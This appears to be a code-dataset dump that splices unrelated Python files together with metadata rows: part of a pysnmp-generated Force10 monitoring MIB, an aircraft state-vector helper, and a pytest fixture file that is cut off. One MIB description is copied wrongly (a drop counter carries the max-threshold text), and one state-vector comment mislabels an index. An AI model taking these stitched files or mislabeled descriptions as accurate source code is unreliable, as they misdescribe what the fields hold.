f10EgUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 6), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastGreenMin.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10EgUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 7), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastGreenMax.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10EgUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastGreenDrop.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ')
f10EgUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastYellowMin.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10EgUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 10), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastYellowMax.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10EgUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastYellowDrop.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ')
f10EgUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgUnicastRedDrop.setStatus('current')
if mibBuilder.loadTexts: f10EgUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue. ')
f10EgQueueMulticastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5), )
if mibBuilder.loadTexts: f10EgQueueMulticastStatTable.setStatus('current')
if mibBuilder.loadTexts: f10EgQueueMulticastStatTable.setDescription('The Egress Queue Multicast Statistics Table. This table provides Queue statistics for Egress Multicast packets at Force10 Interface. ')
f10EgQueueMulticastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10EgMulticastQueueId"))
if mibBuilder.loadTexts: f10EgQueueMulticastStatEntry.setStatus('current')
if mibBuilder.loadTexts: f10EgQueueMulticastStatEntry.setDescription('An entry in the Egress Queue Multicast Statistics table. The Egress Queue Multicast Statistics Table is indexed by the ifIndex and Queue ID. The IfIndex should be an valid Interface Index as defined in the RFC1213 MIB II Interface Table. ')
f10EgMulticastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 1), F10QueueID()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastQueueId.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastQueueId.setDescription('This is the Queue ID of this entry. This is the 2nd index of this table entry. ')
f10EgMulticastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 2), F10CycloneVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastCycloneVersion.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastCycloneVersion.setDescription('The linecard Cyclone hardware version. ')
f10EgMulticastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastBytes.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ')
f10EgMulticastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastBytesCount.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
f10EgMulticastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastPacketCount.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ')
f10EgMulticastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 6), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastGreenMin.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10EgMulticastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 7), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastGreenMax.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10EgMulticastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastGreenDrop.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastGreenDrop.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10EgMulticastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastYellowMin.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ')
f10EgMulticastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 10), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastYellowMax.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ')
f10EgMulticastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastYellowDrop.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ')
f10EgMulticastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10EgMulticastRedDrop.setStatus('current')
if mibBuilder.loadTexts: f10EgMulticastRedDrop.setDescription('The number of Red packets being dropped in this queue. ')
f10CpuIngQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6), )
if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatTable.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatTable.setDescription('The CPU Ingress Queue Unicast Statistics Table. This table provides Queue statistics for Ingress Unicast packets destined for CPU.')
f10CpuIngQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastDestCpu"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastQueueId"))
if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatEntry.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatEntry.setDescription('An entry in the CPU Ingress Queue Unicast Statistics Table. The CPU Ingress Queue Unicast Statistics Table is indexed by the source linecard/portpipe, cpu port and Queue ID.')
f10CpuIngUnicastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 1), F10SlotID())
if mibBuilder.loadTexts: f10CpuIngUnicastSrcCard.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry.')
f10CpuIngUnicastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 2), F10PortPipeID())
if mibBuilder.loadTexts: f10CpuIngUnicastSrcPortPipe.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard.This is the 2nd index of this table entry.')
f10CpuIngUnicastDestCpu = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 3), F10ProcessorModuleType())
if mibBuilder.loadTexts: f10CpuIngUnicastDestCpu.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastDestCpu.setDescription('This is the destination CPU port of this entry. This is the 3rd index of this table entry.')
f10CpuIngUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 4), F10QueueID())
if mibBuilder.loadTexts: f10CpuIngUnicastQueueId.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 4th index of this table entry.')
f10CpuIngUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 5), F10CycloneVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastCycloneVersion.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version.')
f10CpuIngUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastBytesCount.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 3.0 (X3) hardware only.')
f10CpuIngUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastPacketCount.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 3.0 (X3) hardware only.')
f10CpuIngUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 8), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastGreenMin.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability.')
f10CpuIngUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastGreenMax.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs.')
f10CpuIngUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastGreenDrop.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue.')
f10CpuIngUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 11), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastYellowMin.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability.')
f10CpuIngUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 12), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastYellowMax.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs.')
f10CpuIngUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastYellowDrop.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue.')
f10CpuIngUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10CpuIngUnicastRedDrop.setStatus('current')
if mibBuilder.loadTexts: f10CpuIngUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue.')
f10BcastPktRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10BcastPktRecv.setStatus('current')
if mibBuilder.loadTexts: f10BcastPktRecv.setDescription('The total broadcast packet received. ')
f10BcastPktSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10BcastPktSent.setStatus('current')
if mibBuilder.loadTexts: f10BcastPktSent.setDescription('The total broadcast packet sent. ')
f10McastPktRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10McastPktRecv.setStatus('current')
if mibBuilder.loadTexts: f10McastPktRecv.setDescription('The total multicast packet received. ')
f10McastPktSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10McastPktSent.setStatus('current')
if mibBuilder.loadTexts: f10McastPktSent.setDescription('The total multicast packet sent. ')
f10ArpReqRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10ArpReqRecv.setStatus('current')
if mibBuilder.loadTexts: f10ArpReqRecv.setDescription('The total ARP request received. ')
f10ArpReqSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10ArpReqSent.setStatus('current')
if mibBuilder.loadTexts: f10ArpReqSent.setDescription('The total ARP request sent. ')
f10ArpReplyRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10ArpReplyRecv.setStatus('current')
if mibBuilder.loadTexts: f10ArpReplyRecv.setDescription('The total ARP reply received. ')
f10ArpReplySent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10ArpReplySent.setStatus('current')
if mibBuilder.loadTexts: f10ArpReplySent.setDescription('The total ARP reply sent. ')
f10ArpProxySent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: f10ArpProxySent.setStatus('current')
if mibBuilder.loadTexts: f10ArpProxySent.setDescription('The total ARP proxy sent. ')
mibBuilder.exportSymbols("FORCE10-MONITORING-MIB", f10CpuIngUnicastYellowMin=f10CpuIngUnicastYellowMin, f10EgMulticastBytesCount=f10EgMulticastBytesCount, f10OutQueueStatisticsTable=f10OutQueueStatisticsTable, f10MacAccBytes=f10MacAccBytes, f10InQueueCycloneVersion=f10InQueueCycloneVersion, f10IngUnicastQueueId=f10IngUnicastQueueId, f10MacAccPackets=f10MacAccPackets, f10CpuIngUnicastSrcCard=f10CpuIngUnicastSrcCard, f10WredYellowThresholdLow=f10WredYellowThresholdLow, f10WredStatisticsEntry=f10WredStatisticsEntry, f10CpuIngUnicastPacketCount=f10CpuIngUnicastPacketCount, f10WredRedName=f10WredRedName, f10IngMulticastCycloneVersion=f10IngMulticastCycloneVersion, f10EgMulticastRedDrop=f10EgMulticastRedDrop, f10EgQueueMulticastStatEntry=f10EgQueueMulticastStatEntry, f10WredGreenThresholdLow=f10WredGreenThresholdLow, f10EgMulticastCycloneVersion=f10EgMulticastCycloneVersion, f10InQueueMatchBytes=f10InQueueMatchBytes, f10EgMulticastYellowMax=f10EgMulticastYellowMax, f10MonQueueGroup=f10MonQueueGroup, f10OutQueueBytes=f10OutQueueBytes, f10EgUnicastBytes=f10EgUnicastBytes, f10IngUnicastSrcCard=f10IngUnicastSrcCard, f10ArpStatistic=f10ArpStatistic, f10InQueueBytesCount=f10InQueueBytesCount, f10EgUnicastCycloneVersion=f10EgUnicastCycloneVersion, f10EgMulticastPacketCount=f10EgMulticastPacketCount, f10OutQueueStatisticsEntry=f10OutQueueStatisticsEntry, f10CpuIngUnicastGreenDrop=f10CpuIngUnicastGreenDrop, f10IngMulticastYellowMax=f10IngMulticastYellowMax, f10IngQueueMulticastStatTable=f10IngQueueMulticastStatTable, f10BcastPktRecv=f10BcastPktRecv, f10CpuIngQueueUnicastStatEntry=f10CpuIngQueueUnicastStatEntry, f10EgUnicastGreenMax=f10EgUnicastGreenMax, f10IngMulticastYellowMin=f10IngMulticastYellowMin, f10InQueueMatchBps=f10InQueueMatchBps, f10InQueueStatisticsEntry=f10InQueueStatisticsEntry, f10CpuIngUnicastGreenMax=f10CpuIngUnicastGreenMax, f10WredRedReserve1=f10WredRedReserve1, f10WredRedReserve2=f10WredRedReserve2, f10IngMulticastQueueId=f10IngMulticastQueueId, f10EgMulticastYellowDrop=f10EgMulticastYellowDrop, f10InQueueDropPackets=f10InQueueDropPackets, f10OutQueuePackets=f10OutQueuePackets, f10IngUnicastYellowMax=f10IngUnicastYellowMax, f10EgQueueMulticastStatTable=f10EgQueueMulticastStatTable, f10CpuIngUnicastSrcPortPipe=f10CpuIngUnicastSrcPortPipe, f10CpuIngUnicastBytesCount=f10CpuIngUnicastBytesCount, f10InQueuePktsCount=f10InQueuePktsCount, f10IngMulticastSrcPortPipe=f10IngMulticastSrcPortPipe, f10EgUnicastPacketCount=f10EgUnicastPacketCount, f10IngMulticastGreenMin=f10IngMulticastGreenMin, f10EgQueueUnicastStatEntry=f10EgQueueUnicastStatEntry, f10CpuIngUnicastQueueId=f10CpuIngUnicastQueueId, f10MonQueue=f10MonQueue, f10EgMulticastGreenDrop=f10EgMulticastGreenDrop, f10IngUnicastGreenMin=f10IngUnicastGreenMin, f10IngQueueUnicastStatEntry=f10IngQueueUnicastStatEntry, f10IngMulticastBytesCount=f10IngMulticastBytesCount, f10OutQueueBps=f10OutQueueBps, f10IngMulticastSrcCard=f10IngMulticastSrcCard, f10WredYellowName=f10WredYellowName, f10MonMac=f10MonMac, f10WredYellowReserve1=f10WredYellowReserve1, f10InQueueBytes=f10InQueueBytes, f10MonMibVersion=f10MonMibVersion, f10ArpProxySent=f10ArpProxySent, f10ArpReplySent=f10ArpReplySent, f10MacAccOutIfIndex=f10MacAccOutIfIndex, f10BcastPktSent=f10BcastPktSent, f10IngUnicastCycloneVersion=f10IngUnicastCycloneVersion, f10EgUnicastRedDrop=f10EgUnicastRedDrop, f10InQueueStatisticsTable=f10InQueueStatisticsTable, f10WredStatisticsTable=f10WredStatisticsTable, f10OutQueueBytesCount=f10OutQueueBytesCount, f10IngUnicastBytes=f10IngUnicastBytes, f10CpuIngQueueUnicastStatTable=f10CpuIngQueueUnicastStatTable, f10CpuIngUnicastRedDrop=f10CpuIngUnicastRedDrop, f10IngUnicastYellowMin=f10IngUnicastYellowMin, f10InQueueId=f10InQueueId, f10MacAccounting=f10MacAccounting, f10MonIfQueueGroup=f10MonIfQueueGroup, f10ArpReqRecv=f10ArpReqRecv, f10IngMulticastPacketCount=f10IngMulticastPacketCount, f10IngUnicastGreenMax=f10IngUnicastGreenMax, f10IngMulticastYellowDrop=f10IngMulticastYellowDrop, PYSNMP_MODULE_ID=f10MonitoringMib, f10IngMulticastBytes=f10IngMulticastBytes, f10MonMaxQueue=f10MonMaxQueue, f10CpuIngUnicastDestCpu=f10CpuIngUnicastDestCpu, f10WredGreenName=f10WredGreenName, f10CpuIngUnicastYellowDrop=f10CpuIngUnicastYellowDrop, f10CpuIngUnicastGreenMin=f10CpuIngUnicastGreenMin, f10EgMulticastYellowMin=f10EgMulticastYellowMin, f10MonIfQueue=f10MonIfQueue, f10WredRedThresholdHigh=f10WredRedThresholdHigh, f10IngUnicastGreenDrop=f10IngUnicastGreenDrop, f10EgUnicastYellowMax=f10EgUnicastYellowMax, f10EgQueueUnicastStatTable=f10EgQueueUnicastStatTable, f10MacAccountingDestEntry=f10MacAccountingDestEntry, f10WredGreenDropPackets=f10WredGreenDropPackets, f10CpuIngUnicastYellowMax=f10CpuIngUnicastYellowMax, f10WredYellowReserve2=f10WredYellowReserve2, f10EgUnicastYellowDrop=f10EgUnicastYellowDrop, f10MacAccMacAddr=f10MacAccMacAddr, f10MacAccInIfIndex=f10MacAccInIfIndex, f10IpStatistic=f10IpStatistic, f10WredGreenThresholdHigh=f10WredGreenThresholdHigh, f10IngUnicastSrcPortPipe=f10IngUnicastSrcPortPipe, f10McastPktSent=f10McastPktSent, f10EgMulticastGreenMin=f10EgMulticastGreenMin, f10MonitoringMib=f10MonitoringMib, f10MonGroup=f10MonGroup, f10IngUnicastDestCard=f10IngUnicastDestCard, f10IngUnicastDestPortPipe=f10IngUnicastDestPortPipe, f10IngMulticastRedDrop=f10IngMulticastRedDrop, f10EgUnicastYellowMin=f10EgUnicastYellowMin, f10MacGroup=f10MacGroup, f10IngMulticastGreenDrop=f10IngMulticastGreenDrop, f10WredYellowDropPackets=f10WredYellowDropPackets, f10IngUnicastRedDrop=f10IngUnicastRedDrop, f10NetworkStat=f10NetworkStat, f10EgMulticastGreenMax=f10EgMulticastGreenMax, f10EgMulticastBytes=f10EgMulticastBytes, f10WredGreenReserve1=f10WredGreenReserve1, f10IngUnicastYellowDrop=f10IngUnicastYellowDrop, f10ArpReqSent=f10ArpReqSent, f10IngQueueUnicastStatTable=f10IngQueueUnicastStatTable, f10ArpReplyRecv=f10ArpReplyRecv, f10EgMulticastQueueId=f10EgMulticastQueueId, f10WredQueueId=f10WredQueueId, f10IngUnicastBytesCount=f10IngUnicastBytesCount, f10CpuIngUnicastCycloneVersion=f10CpuIngUnicastCycloneVersion, f10WredYellowThresholdHigh=f10WredYellowThresholdHigh, f10McastPktRecv=f10McastPktRecv, f10EgUnicastGreenMin=f10EgUnicastGreenMin, f10OutQueueId=f10OutQueueId, f10IngQueueMulticastStatEntry=f10IngQueueMulticastStatEntry, f10WredGreenReserve2=f10WredGreenReserve2, f10EgUnicastGreenDrop=f10EgUnicastGreenDrop, f10IngMulticastGreenMax=f10IngMulticastGreenMax, f10InQueueMatchPackets=f10InQueueMatchPackets, f10EgUnicastQueueId=f10EgUnicastQueueId, f10OutQueueCycloneVersion=f10OutQueueCycloneVersion, f10WredRedDropPackets=f10WredRedDropPackets, f10MacAccVlan=f10MacAccVlan, f10MacAccountingDestTable=f10MacAccountingDestTable, f10WredRedThresholdLow=f10WredRedThresholdLow, f10EgUnicastBytesCount=f10EgUnicastBytesCount, f10IngUnicastPacketCount=f10IngUnicastPacketCount)
| 131.044543 | 6,796 | 0.791261 | 6,857 | 58,839 | 6.789412 | 0.062418 | 0.071915 | 0.125851 | 0.012802 | 0.575298 | 0.4389 | 0.391752 | 0.38084 | 0.311116 | 0.282719 | 0 | 0.085852 | 0.095906 | 58,839 | 448 | 6,797 | 131.337054 | 0.789307 | 0.005744 | 0 | 0 | 0 | 0.138636 | 0.279748 | 0.013882 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.029545 | 0.020455 | 0 | 0.020455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
056887fff4c016e1bd810fe62a7c889a8d65cc5e | 1,952 | py | Python | aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py | AlejandroRios/IAANDOCAC-aircraft-framework | 9768e9736af70e20e8ef1cc0ad6501f3a28dbb47 | [
"Apache-2.0"
] | null | null | null | aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py | AlejandroRios/IAANDOCAC-aircraft-framework | 9768e9736af70e20e8ef1cc0ad6501f3a28dbb47 | [
"Apache-2.0"
] | null | null | null | aircraft_framework_win/framework_PhD/framework/Stability/Dynamic/state_vector.py | AlejandroRios/IAANDOCAC-aircraft-framework | 9768e9736af70e20e8ef1cc0ad6501f3a28dbb47 | [
"Apache-2.0"
] | null | null | null | """
Function :
Title :
Written by:
Email : aarc.88@gmail.com
Date :
Last edit :
Language : Python 3.8 or >
Aeronautical Institute of Technology - Airbus Brazil
Description:
-
Inputs:
-
Outputs:
-
TODO's:
-
"""
# =============================================================================
# IMPORTS
# =============================================================================
import numpy as np
# =============================================================================
# CLASSES
# =============================================================================
# =============================================================================
# FUNCTIONS
# =============================================================================
def state_vector(x, trim_par):
X = np.zeros((12, 1))
X[0] = x[0] # V
X[1] = x[1] # alpha
X[2] = x[2] # q
X[3] = x[3] # theta
X[4] = trim_par['H_m'] # H
X[6] = x[4] # beta
X[7] = x[5] # phi
X[8] = x[6] # p
X[9] = x[7] # r
X[10] = x[8] # r
return X
# =============================================================================
# MAIN
# =============================================================================
# =============================================================================
# TEST
# =============================================================================
# x = [68.0588,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0,
# 0]
# trim_par = {}
# trim_par = {'V':68.0588,
# 'H_m':10000,
# 'chi_deg':0,
# 'gamma_deg':0,
# 'phi_dot_deg_s':0,
# 'theta_dot_deg':0,
# 'psi_dot_deg_s':0,
# 'beta_deg_eq':0,
# 'W':[0, 0, 0]}
# X = state_vector(x, trim_par)
# print(X)
| 22.436782 | 79 | 0.236168 | 164 | 1,952 | 2.682927 | 0.463415 | 0.063636 | 0.081818 | 0.090909 | 0.115909 | 0.029545 | 0.029545 | 0.029545 | 0.029545 | 0.029545 | 0 | 0.04577 | 0.26127 | 1,952 | 86 | 80 | 22.697674 | 0.259362 | 0.798668 | 0 | 0 | 0 | 0 | 0.008982 | 0 | 0 | 0 | 0 | 0.011628 | 0 | 1 | 0.071429 | false | 0 | 0.071429 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
057cd72af1308e0a81b1f8fd12ba9d1678f47b2d | 1,262 | py | Python | tests/fixtures.py | GustavoKatel/pushbullet-cli | e5102772752a97db539594b0d50b5effb36a22e2 | [
"MIT"
] | 176 | 2017-01-30T16:21:48.000Z | 2022-02-10T05:32:57.000Z | tests/fixtures.py | GustavoKatel/pushbullet-cli | e5102772752a97db539594b0d50b5effb36a22e2 | [
"MIT"
] | 49 | 2017-01-21T20:27:03.000Z | 2022-01-16T02:57:51.000Z | tests/fixtures.py | GustavoKatel/pushbullet-cli | e5102772752a97db539594b0d50b5effb36a22e2 | [
"MIT"
] | 21 | 2017-01-26T06:08:54.000Z | 2022-01-04T19:53:25.000Z | import click
import pytest
from click.testing import CliRunner
@pytest.yield_fixture
def pb_api(mocker):
from pushbullet_cli import app
from tests.mock_pushbullet import MockPushBullet
mock_pb = MockPushBullet()
mocker.patch.object(app, "_get_pb", return_value=mock_pb)
yield mock_pb
@pytest.fixture
def runner(pb_api):
